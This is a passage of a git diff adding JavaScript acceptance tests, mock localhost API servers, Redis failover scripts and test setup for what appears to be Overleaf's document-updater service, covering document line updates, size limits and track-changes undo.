version to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should update the lines in the doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.lines.should.deep.equal(this.newLines) + done() + } + ) + }) + + it('should bump the version in the doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.version.should.equal(this.version + 2) + done() + } + ) + }) + + it('should leave the document in redis', function (done) { + docUpdaterRedis.get( + Keys.docLines({ doc_id: this.doc_id }), + (error, lines) => { + if (error) { + throw error + } + expect(JSON.parse(lines)).to.deep.equal(this.newLines) + done() + } + ) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + + describe('when doc has the same contents', function () { + beforeEach(function (done) { + numberOfReceivedUpdates = 0 + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + done() + } + ) + }) + + it('should not bump the version in doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.version.should.equal(this.version + 2) + done() + } + ) + }) + + it('should not emit any updates', function (done) { + setTimeout(() => { + expect(numberOfReceivedUpdates).to.equal(0) + done() + }, 100) // delay by 100ms: make sure we do not check too early! 
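+        // Setting a doc to its current contents appears to be treated as a
+        // no-op: no update is published on the applied-ops channel and the
+        // version stays where it was (asserted above).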
+ }) + }) + }) + + describe('when the updated doc does not exist in the doc updater', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + numberOfReceivedUpdates = 0 + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should emit an update', function () { + expect(numberOfReceivedUpdates).to.equal(1) + }) + + it('should send the updated doc lines to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should remove the document from redis', function (done) { + docUpdaterRedis.get( + Keys.docLines({ doc_id: this.doc_id }), + (error, lines) => { + if (error) { + throw error + } + expect(lines).to.not.exist + done() + } + ) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + }) + + const DOC_TOO_LARGE_TEST_CASES = [ + { + desc: 'when the updated doc is too large for the body parser', + size: Settings.maxJsonRequestSize, + expectedStatusCode: 413, + }, + { + desc: 'when the updated doc is larger than the HTTP controller limit', + size: Settings.max_doc_length, + expectedStatusCode: 406, + }, + ] + + DOC_TOO_LARGE_TEST_CASES.forEach(testCase => { + describe(testCase.desc, function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + this.newLines = [] + while (JSON.stringify(this.newLines).length <= testCase.size) { + this.newLines.push('(a long line of text)'.repeat(10000)) + } + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it(`should return a ${testCase.expectedStatusCode} status code`, function () { + this.statusCode.should.equal(testCase.expectedStatusCode) + }) + + it('should not send the updated doc lines to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should not flush project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(false) + }) + }) + }) + + describe('when the updated doc is large but under the bodyParser and HTTPController size limit', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + 
version: this.version, + }) + + this.newLines = [] + while (JSON.stringify(this.newLines).length < 2 * 1024 * 1024) { + // limit in HTTPController + this.newLines.push('(a long line of text)'.repeat(10000)) + } + this.newLines.pop() // remove the line which took it over the limit + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should send the updated doc lines to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + }) + + describe('with track changes', function () { + before(function () { + this.lines = ['one', 'one and a half', 'two', 'three'] + this.id_seed = '587357bd35e64f6157' + this.update = { + doc: this.doc_id, + op: [ + { + d: 'one and a half\n', + p: 4, + }, + ], + meta: { + tc: this.id_seed, + user_id: this.user_id, + }, + v: this.version, + } + }) + + describe('with the undo flag', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + // Go back to old lines, with undo flag + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + true, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should undo the tracked changes', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error) { + throw error + } + const { ranges } = data + expect(ranges.changes).to.be.undefined + done() + } + ) + }) + }) + + describe('without the undo flag', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + // Go back to old lines, without undo flag + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + 
MockWebApi.setDocument.resetHistory() + }) + + it('should not undo the tracked changes', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error) { + throw error + } + const { ranges } = data + expect(ranges.changes.length).to.equal(1) + done() + } + ) + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/SizeCheckTests.js b/services/document-updater/test/acceptance/js/SizeCheckTests.js new file mode 100644 index 0000000..dd48461 --- /dev/null +++ b/services/document-updater/test/acceptance/js/SizeCheckTests.js @@ -0,0 +1,194 @@ +const { expect } = require('chai') +const Settings = require('@overleaf/settings') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('SizeChecks', function () { + before(function (done) { + DocUpdaterApp.ensureRunning(done) + }) + beforeEach(function () { + this.version = 0 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'insert some more lines that will bring it above the limit\n', + p: 42, + }, + ], + v: this.version, + } + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + }) + + describe('when a doc is above the doc size limit already', function () { + beforeEach(function () { + this.lines = ['x'.repeat(Settings.max_doc_length)] // including the extra newline, this will be over the limit + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should error when fetching the doc', function (done) { + DocUpdaterClient.getDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(500) + done() + }) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should still error when fetching the doc', function (done) { + DocUpdaterClient.getDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(500) + done() + }) + }) + }) + }) + + describe('when the stringified JSON is above the doc size limit but the doc character count is not', function () { + beforeEach(function () { + let charsRemaining = Settings.max_doc_length + this.lines = [] + // Take the maximum allowed doc length and split it into N lines of 63 characters + a newline. + // The character count will be exactly max_doc_length + // The JSON stringified size will exceed max_doc_length, due to the JSON formatting of the array. + // This document should be allowed, because we use the character count as the limit, not the JSON size. 
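+      // Worked example of the padding math below: each pushed line holds up
+      // to 63 'x' characters and costs 64 towards the character count (63
+      // plus one newline), while JSON.stringify spends three extra bytes per
+      // line on the two quotes and the comma, e.g.
+      //
+      //   JSON.stringify(['x'.repeat(63), 'x'.repeat(63)]).length // 133
+      //   // vs. a character count of 63 + 1 + 63 + 1 = 128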
+ while (charsRemaining > 0) { + const charstoAdd = Math.min(charsRemaining - 1, 63) // allow for additional newline + this.lines.push('x'.repeat(charstoAdd)) + charsRemaining -= charstoAdd + 1 + } + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should be able to fetch the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + }) + }) + + describe('when a doc is just below the doc size limit', function () { + beforeEach(function () { + this.lines = ['x'.repeat(Settings.max_doc_length - 1)] // character count is exactly max_doc_length after including the newline + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should be able to fetch the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js b/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js new file mode 100644 index 0000000..d34996c --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js @@ -0,0 +1,42 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
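+// This helper boots the document-updater app at most once per test run: the
+// first ensureRunning(cb) call queues cb and calls app.listen; callers
+// arriving while startup is in flight are queued behind it; later callers
+// return immediately. A sketch of the same memoisation with a promise (an
+// alternative shape, not what the code below does):
+//
+//   let starting = null
+//   function ensureRunning() {
+//     starting ??= new Promise((resolve, reject) =>
+//       app.listen(3003, '127.0.0.1', err => (err ? reject(err) : resolve()))
+//     )
+//     return starting
+//   }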
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } + this.initing = true + this.callbacks.push(callback) + app.listen(3003, '127.0.0.1', error => { + if (error != null) { + throw error + } + this.running = true + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + }) + }, +} diff --git a/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js b/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js new file mode 100644 index 0000000..0a4ec89 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js @@ -0,0 +1,246 @@ +let DocUpdaterClient +const Settings = require('@overleaf/settings') +const _ = require('lodash') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const request = require('request').defaults({ jar: false }) +const async = require('async') + +const rclientSub = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +rclientSub.subscribe('applied-ops') +rclientSub.setMaxListeners(0) + +module.exports = DocUpdaterClient = { + randomId() { + let str = '' + for (let i = 0; i < 24; i++) { + str += Math.floor(Math.random() * 16).toString(16) + } + return str + }, + + subscribeToAppliedOps(callback) { + rclientSub.on('message', callback) + }, + + _getPendingUpdateListKey() { + const shard = _.random(0, Settings.dispatcherCount - 1) + if (shard === 0) { + return 'pending-updates-list' + } else { + return `pending-updates-list-${shard}` + } + }, + + sendUpdate(projectId, docId, update, callback) { + rclient.rpush( + keys.pendingUpdates({ doc_id: docId }), + JSON.stringify(update), + error => { + if (error) { + return callback(error) + } + const docKey = `${projectId}:${docId}` + rclient.sadd('DocsWithPendingUpdates', docKey, error => { + if (error) { + return callback(error) + } + + rclient.rpush( + DocUpdaterClient._getPendingUpdateListKey(), + docKey, + callback + ) + }) + } + ) + }, + + sendUpdates(projectId, docId, updates, callback) { + DocUpdaterClient.preloadDoc(projectId, docId, error => { + if (error) { + return callback(error) + } + const jobs = updates.map(update => callback => { + DocUpdaterClient.sendUpdate(projectId, docId, update, callback) + }) + async.series(jobs, err => { + if (err) { + return callback(err) + } + DocUpdaterClient.waitForPendingUpdates(projectId, docId, callback) + }) + }) + }, + + waitForPendingUpdates(projectId, docId, callback) { + async.retry( + { times: 30, interval: 100 }, + cb => + rclient.llen(keys.pendingUpdates({ doc_id: docId }), (err, length) => { + if (err) { + return cb(err) + } + if (length > 0) { + cb(new Error('updates still pending')) + } else { + cb() + } + }), + callback + ) + }, + + getDoc(projectId, docId, callback) { + request.get( + 
`http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + getDocAndRecentOps(projectId, docId, fromVersion, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + getProjectLastUpdatedAt(projectId, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/last_updated_at`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + preloadDoc(projectId, docId, callback) { + DocUpdaterClient.getDoc(projectId, docId, callback) + }, + + peekDoc(projectId, docId, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/peek`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + flushDoc(projectId, docId, callback) { + request.post( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/flush`, + (error, res, body) => callback(error, res, body) + ) + }, + + setDocLines(projectId, docId, lines, source, userId, undoing, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + json: { + lines, + source, + user_id: userId, + undoing, + }, + }, + (error, res, body) => callback(error, res, body) + ) + }, + + deleteDoc(projectId, docId, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + (error, res, body) => callback(error, res, body) + ) + }, + + flushProject(projectId, callback) { + request.post(`http://127.0.0.1:3003/project/${projectId}/flush`, callback) + }, + + deleteProject(projectId, callback) { + request.del(`http://127.0.0.1:3003/project/${projectId}`, callback) + }, + + deleteProjectOnShutdown(projectId, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}?background=true&shutdown=true`, + callback + ) + }, + + flushOldProjects(callback) { + request.get( + 'http://127.0.0.1:3003/flush_queued_projects?min_delete_age=1', + callback + ) + }, + + acceptChange(projectId, docId, changeId, callback) { + request.post( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/change/${changeId}/accept`, + callback + ) + }, + + acceptChanges(projectId, docId, changeIds, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/change/accept`, + json: { change_ids: changeIds }, + }, + callback + ) + }, + + removeComment(projectId, docId, comment, callback) { + request.del( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}/comment/${comment}`, + callback + ) + }, + + getProjectDocs(projectId, projectStateHash, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc?state=${projectStateHash}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + sendProjectUpdate(projectId, userId, updates, version, callback) { + request.post( + { + url: `http://127.0.0.1:3003/project/${projectId}`, + json: { userId, updates, version }, + }, + (error, res, 
body) => callback(error, res, body) + ) + }, +} diff --git a/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js b/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js new file mode 100644 index 0000000..a2cd915 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockDocstoreApi.js @@ -0,0 +1,111 @@ +const express = require('express') +const bodyParser = require('body-parser') +const app = express() +const MAX_REQUEST_SIZE = 2 * (2 * 1024 * 1024 + 64 * 1024) + +const MockDocstoreApi = { + docs: {}, + + clearDocs() { + this.docs = {} + }, + + getDoc(projectId, docId) { + return this.docs[`${projectId}:${docId}`] + }, + + insertDoc(projectId, docId, doc) { + if (doc.version == null) { + doc.version = 0 + } + if (doc.lines == null) { + doc.lines = [] + } + this.docs[`${projectId}:${docId}`] = doc + }, + + patchDocument(projectId, docId, meta, callback) { + Object.assign(this.docs[`${projectId}:${docId}`], meta) + callback(null) + }, + + peekDocument(projectId, docId, callback) { + callback(null, this.docs[`${projectId}:${docId}`]) + }, + + getAllDeletedDocs(projectId, callback) { + callback( + null, + Object.entries(this.docs) + .filter(([key, doc]) => key.startsWith(projectId) && doc.deleted) + .map(([key, doc]) => { + return { + _id: key.split(':')[1], + name: doc.name, + deletedAt: doc.deletedAt, + } + }) + ) + }, + + run() { + app.get('/project/:project_id/doc-deleted', (req, res, next) => { + this.getAllDeletedDocs(req.params.project_id, (error, docs) => { + if (error) { + res.sendStatus(500) + } else { + res.json(docs) + } + }) + }) + + app.get('/project/:project_id/doc/:doc_id/peek', (req, res, next) => { + this.peekDocument( + req.params.project_id, + req.params.doc_id, + (error, doc) => { + if (error) { + res.sendStatus(500) + } else if (doc) { + res.json(doc) + } else { + res.sendStatus(404) + } + } + ) + }) + + app.patch( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: MAX_REQUEST_SIZE }), + (req, res, next) => { + MockDocstoreApi.patchDocument( + req.params.project_id, + req.params.doc_id, + req.body, + error => { + if (error) { + res.sendStatus(500) + } else { + res.sendStatus(204) + } + } + ) + } + ) + + app + .listen(3016, error => { + if (error) { + throw error + } + }) + .on('error', error => { + console.error('error starting MockDocstoreApi:', error.message) + process.exit(1) + }) + }, +} + +MockDocstoreApi.run() +module.exports = MockDocstoreApi diff --git a/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js b/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js new file mode 100644 index 0000000..f588d5c --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockProjectHistoryApi.js @@ -0,0 +1,40 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
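+// The mock services in these acceptance tests share one pattern: a plain
+// object holds the canned behaviour, and a small express app fronts it so
+// the real document-updater code can reach it over HTTP. Tests then
+// sinon.spy() or sinon.stub() the object's methods (flushProject below) to
+// assert on calls or inject failures. A sketch of such a stub, with a
+// hypothetical error:
+//
+//   sinon.stub(MockProjectHistoryApi, 'flushProject')
+//     .callsFake((projectId, cb) => cb(new Error('history down')))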
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockProjectHistoryApi +const express = require('express') +const app = express() + +module.exports = MockProjectHistoryApi = { + flushProject(docId, callback) { + if (callback == null) { + callback = function () {} + } + return callback() + }, + + run() { + app.post('/project/:project_id/flush', (req, res, next) => { + return this.flushProject(req.params.project_id, error => { + if (error != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(204) + } + }) + }) + + return app.listen(3054, error => { + if (error != null) { + throw error + } + }) + }, +} + +MockProjectHistoryApi.run() diff --git a/services/document-updater/test/acceptance/js/helpers/MockWebApi.js b/services/document-updater/test/acceptance/js/helpers/MockWebApi.js new file mode 100644 index 0000000..5bc3910 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/MockWebApi.js @@ -0,0 +1,121 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let MockWebApi +const express = require('express') +const bodyParser = require('body-parser') +const app = express() +const MAX_REQUEST_SIZE = 2 * (2 * 1024 * 1024 + 64 * 1024) + +module.exports = MockWebApi = { + docs: {}, + + clearDocs() { + return (this.docs = {}) + }, + + insertDoc(projectId, docId, doc) { + if (doc.version == null) { + doc.version = 0 + } + if (doc.lines == null) { + doc.lines = [] + } + doc.pathname = '/a/b/c.tex' + return (this.docs[`${projectId}:${docId}`] = doc) + }, + + setDocument( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy, + callback + ) { + if (callback == null) { + callback = function () {} + } + const doc = + this.docs[`${projectId}:${docId}`] || + (this.docs[`${projectId}:${docId}`] = {}) + doc.lines = lines + doc.version = version + doc.ranges = ranges + doc.pathname = '/a/b/c.tex' + doc.lastUpdatedAt = lastUpdatedAt + doc.lastUpdatedBy = lastUpdatedBy + return callback(null) + }, + + getDocument(projectId, docId, callback) { + if (callback == null) { + callback = function () {} + } + return callback(null, this.docs[`${projectId}:${docId}`]) + }, + + run() { + app.get('/project/:project_id/doc/:doc_id', (req, res, next) => { + return this.getDocument( + req.params.project_id, + req.params.doc_id, + (error, doc) => { + if (error != null) { + return res.sendStatus(500) + } else if (doc != null) { + return res.send(JSON.stringify(doc)) + } else { + return res.sendStatus(404) + } + } + ) + }) + + app.post( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: MAX_REQUEST_SIZE }), + (req, res, next) => { + return MockWebApi.setDocument( + req.params.project_id, + req.params.doc_id, + req.body.lines, + req.body.version, + req.body.ranges, + req.body.lastUpdatedAt, + req.body.lastUpdatedBy, + error => { + if (error != null) { + return res.sendStatus(500) + } else { + return res.json({ rev: '123' }) + } + } + ) + } + ) + + return app + .listen(3000, error => { + if (error 
!= null) { + throw error + } + }) + .on('error', error => { + console.error('error starting MockWebApi:', error.message) + return process.exit(1) + }) + }, +} + +MockWebApi.run() diff --git a/services/document-updater/test/cluster_failover/js/test_blpop_failover.js b/services/document-updater/test/cluster_failover/js/test_blpop_failover.js new file mode 100644 index 0000000..17d9a26 --- /dev/null +++ b/services/document-updater/test/cluster_failover/js/test_blpop_failover.js @@ -0,0 +1,65 @@ +let listenInBackground, sendPings +const redis = require('@overleaf/redis-wrapper') +const rclient1 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +const rclient2 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +let counter = 0 +const sendPing = function (cb) { + if (cb == null) { + cb = function () {} + } + return rclient1.rpush('test-blpop', counter, error => { + if (error != null) { + console.error('[SENDING ERROR]', error.message) + } + if (error == null) { + counter += 1 + } + return cb() + }) +} + +let previous = null +const listenForPing = cb => + rclient2.blpop('test-blpop', 200, (error, result) => { + if (error != null) { + return cb(error) + } + let [, value] = Array.from(result) + value = parseInt(value, 10) + if (value % 10 === 0) { + console.log('.') + } + if (previous != null && value !== previous + 1) { + error = new Error( + `Counter not in order. Got ${value}, expected ${previous + 1}` + ) + } + previous = value + return cb(error, value) + }) + +const PING_DELAY = 100 +;(sendPings = () => sendPing(() => setTimeout(sendPings, PING_DELAY)))() +;(listenInBackground = () => + listenForPing(error => { + if (error) { + console.error('[RECEIVING ERROR]', error.message) + } + return setTimeout(listenInBackground) + }))() diff --git a/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js b/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js new file mode 100644 index 0000000..ebc04a3 --- /dev/null +++ b/services/document-updater/test/cluster_failover/js/test_pubsub_failover.js @@ -0,0 +1,54 @@ +let sendPings +const redis = require('@overleaf/redis-wrapper') +const rclient1 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +const rclient2 = redis.createClient({ + cluster: [ + { + port: '7000', + host: '127.0.0.1', + }, + ], +}) + +let counter = 0 +const sendPing = function (cb) { + if (cb == null) { + cb = function () {} + } + return rclient1.publish('test-pubsub', counter, error => { + if (error) { + console.error('[SENDING ERROR]', error.message) + } + if (error == null) { + counter += 1 + } + return cb() + }) +} + +let previous = null +rclient2.subscribe('test-pubsub') +rclient2.on('message', (channel, value) => { + value = parseInt(value, 10) + if (value % 10 === 0) { + console.log('.') + } + if (previous != null && value !== previous + 1) { + console.error( + '[RECEIVING ERROR]', + `Counter not in order. 
Got ${value}, expected ${previous + 1}`
+    )
+  }
+  return (previous = value)
+})
+
+const PING_DELAY = 100
+;(sendPings = () => sendPing(() => setTimeout(sendPings, PING_DELAY)))()
diff --git a/services/document-updater/test/setup.js b/services/document-updater/test/setup.js
new file mode 100644
index 0000000..1099724
--- /dev/null
+++ b/services/document-updater/test/setup.js
@@ -0,0 +1,52 @@
+const chai = require('chai')
+const chaiAsPromised = require('chai-as-promised')
+const sinonChai = require('sinon-chai')
+const SandboxedModule = require('sandboxed-module')
+const sinon = require('sinon')
+
+// ensure every ObjectId has the id string as a property for correct comparisons
+require('mongodb-legacy').ObjectId.cacheHexString = true
+
+// Chai configuration
+chai.should()
+chai.use(chaiAsPromised)
+// Load sinon-chai assertions so expect(stubFn).to.have.been.calledWith('abc')
+// has a nicer failure message
+chai.use(sinonChai)
+
+// Global stubs
+const sandbox = sinon.createSandbox()
+const stubs = {
+  logger: {
+    debug: sandbox.stub(),
+    log: sandbox.stub(),
+    warn: sandbox.stub(),
+    err: sandbox.stub(),
+    error: sandbox.stub(),
+  },
+}
+
+// SandboxedModule configuration
+SandboxedModule.configure({
+  requires: {
+    '@overleaf/logger': stubs.logger,
+    'mongodb-legacy': require('mongodb-legacy'), // for ObjectId comparisons
+  },
+  globals: { Buffer, JSON, Math, console, process },
+  sourceTransformers: {
+    removeNodePrefix: function (source) {
+      return source.replace(/require\(['"]node:/g, "require('")
+    },
+  },
+})
+
+// Mocha hooks
+exports.mochaHooks = {
+  beforeEach() {
+    this.logger = stubs.logger
+  },
+
+  afterEach() {
+    sandbox.reset()
+  },
+}
diff --git a/services/document-updater/test/stress/js/run.js b/services/document-updater/test/stress/js/run.js
new file mode 100644
index 0000000..1bda73c
--- /dev/null
+++ b/services/document-updater/test/stress/js/run.js
@@ -0,0 +1,387 @@
+/* eslint-disable
+    no-return-assign,
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
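+//
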